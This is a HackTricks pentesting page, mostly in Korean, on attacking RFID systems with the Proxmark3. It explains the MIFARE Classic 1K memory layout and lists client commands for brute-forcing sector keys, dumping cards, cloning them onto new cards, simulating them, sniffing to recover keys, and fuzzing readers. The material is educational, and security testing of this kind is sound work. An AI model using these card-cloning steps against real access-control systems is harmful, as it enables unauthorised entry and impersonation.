# Proxmark 3 {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} ## Proxmark3둜 RFID μ‹œμŠ€ν…œ κ³΅κ²©ν•˜κΈ° κ°€μž₯ λ¨Όμ € ν•΄μ•Ό ν•  일은 [**Proxmark3**](https://proxmark.com)λ₯Ό 가지고 [**μ†Œν”„νŠΈμ›¨μ–΄μ™€ κ·Έ μ˜μ‘΄μ„± μ„€μΉ˜ν•˜κΈ°**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)[**s**](https://github.com/Proxmark/proxmark3/wiki/Kali-Linux)μž…λ‹ˆλ‹€. ### MIFARE Classic 1KB κ³΅κ²©ν•˜κΈ° **16개의 μ„Ήν„°**κ°€ 있으며, 각 μ„Ήν„°λŠ” **4개의 블둝**을 가지고 있고 각 블둝은 **16B**λ₯Ό ν¬ν•¨ν•©λ‹ˆλ‹€. UIDλŠ” μ„Ήν„° 0 블둝 0에 있으며 (λ³€κ²½ν•  수 μ—†μŠ΅λ‹ˆλ‹€).\ 각 섹터에 μ ‘κ·Όν•˜λ €λ©΄ **2개의 ν‚€** (**A**와 **B**)κ°€ ν•„μš”ν•˜λ©°, 이 ν‚€λŠ” **각 μ„Ήν„°μ˜ 블둝 3**에 μ €μž₯λ©λ‹ˆλ‹€ (μ„Ήν„° 트레일러). μ„Ήν„° νŠΈλ ˆμΌλŸ¬λŠ” λ˜ν•œ **읽기 및 μ“°κΈ°** κΆŒν•œμ„ λΆ€μ—¬ν•˜λŠ” **μ ‘κ·Ό λΉ„νŠΈ**λ₯Ό μ €μž₯ν•©λ‹ˆλ‹€.\ 2개의 ν‚€λŠ” 첫 번째 ν‚€λ₯Ό μ•Œκ³  있으면 읽기 κΆŒν•œμ„ λΆ€μ—¬ν•˜κ³  두 번째 ν‚€λ₯Ό μ•Œκ³  있으면 μ“°κΈ° κΆŒν•œμ„ λΆ€μ—¬ν•˜λŠ” 데 μœ μš©ν•©λ‹ˆλ‹€ (예λ₯Ό λ“€μ–΄). μ—¬λŸ¬ 가지 곡격을 μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€. ```bash proxmark3> hf mf #List attacks proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce proxmark3> hf mf fchk 1 t # Improved keys BF proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin) proxmark3> hf mf restore # Copy data to a new card proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1 proxmark3> hf mf eget 01 # Read block 1 proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card ``` Proxmark3λŠ” **νƒœκ·Έμ™€ 리더 κ°„μ˜ 톡신을 도청**ν•˜μ—¬ λ―Όκ°ν•œ 데이터λ₯Ό μ°ΎλŠ” λ“±μ˜ λ‹€λ₯Έ μž‘μ—…μ„ μˆ˜ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€. 이 μΉ΄λ“œμ—μ„œλŠ” 톡신을 μŠ€λ‹ˆν•‘ν•˜κ³  μ‚¬μš©λœ ν‚€λ₯Ό 계산할 수 μžˆμŠ΅λ‹ˆλ‹€. μ™œλƒν•˜λ©΄ **μ‚¬μš©λœ μ•”ν˜Έν™” μž‘μ—…μ΄ μ•½ν•˜κΈ°** λ•Œλ¬Έμ— 평문과 μ•”ν˜Έλ¬Έμ„ μ•Œκ³  있으면 이λ₯Ό 계산할 수 μžˆμŠ΅λ‹ˆλ‹€(`mfkey64` 도ꡬ). ### Raw Commands IoT μ‹œμŠ€ν…œμ€ λ•Œλ•Œλ‘œ **λΉ„λΈŒλžœλ“œ λ˜λŠ” 비상업적 νƒœκ·Έ**λ₯Ό μ‚¬μš©ν•©λ‹ˆλ‹€. 이 경우 Proxmark3λ₯Ό μ‚¬μš©ν•˜μ—¬ νƒœκ·Έμ— μ‚¬μš©μž μ •μ˜ **μ›μ‹œ λͺ…령을 전솑**ν•  수 μžˆμŠ΅λ‹ˆλ‹€. ```bash proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04 SAK : 08 [2] TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1 proprietary non iso14443-4 card found, RATS not supported No chinese magic backdoor command detected Prng detection: WEAK Valid ISO14443A Tag Found - Quiting Search ``` 이 정보λ₯Ό 톡해 μΉ΄λ“œμ— λŒ€ν•œ 정보와 μΉ΄λ“œμ™€ ν†΅μ‹ ν•˜λŠ” 방법을 검색할 수 μžˆμŠ΅λ‹ˆλ‹€. Proxmark3λŠ” λ‹€μŒκ³Ό 같은 μ›μ‹œ λͺ…령을 전솑할 수 μžˆμŠ΅λ‹ˆλ‹€: `hf 14a raw -p -b 7 26` ### Scripts Proxmark3 μ†Œν”„νŠΈμ›¨μ–΄μ—λŠ” κ°„λ‹¨ν•œ μž‘μ—…μ„ μˆ˜ν–‰ν•˜λŠ” 데 μ‚¬μš©ν•  수 μžˆλŠ” **μžλ™ν™” 슀크립트**의 미리 λ‘œλ“œλœ λͺ©λ‘μ΄ ν¬ν•¨λ˜μ–΄ μžˆμŠ΅λ‹ˆλ‹€. 전체 λͺ©λ‘μ„ κ²€μƒ‰ν•˜λ €λ©΄ `script list` λͺ…령을 μ‚¬μš©ν•˜μ‹­μ‹œμ˜€. λ‹€μŒμœΌλ‘œ, `script run` λͺ…령을 μ‚¬μš©ν•˜κ³  슀크립트의 이름을 μž…λ ₯ν•˜μ‹­μ‹œμ˜€: ``` proxmark3> script run mfkeys ``` 당신은 **νƒœκ·Έ 리더**λ₯Ό **퍼즈**ν•˜κΈ° μœ„ν•œ 슀크립트λ₯Ό λ§Œλ“€ 수 μžˆμŠ΅λ‹ˆλ‹€. μœ νš¨ν•œ **μΉ΄λ“œ**의 데이터λ₯Ό λ³΅μ‚¬ν•˜λ €λ©΄, ν•˜λ‚˜ μ΄μƒμ˜ λ¬΄μž‘μœ„ **λ°”μ΄νŠΈ**λ₯Ό **λ¬΄μž‘μœ„ν™”**ν•˜κ³  각 λ°˜λ³΅μ—μ„œ **리더가 μΆ©λŒν•˜λŠ”μ§€** ν™•μΈν•˜λŠ” **Lua 슀크립트**λ₯Ό μž‘μ„±ν•˜μ„Έμš”. {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}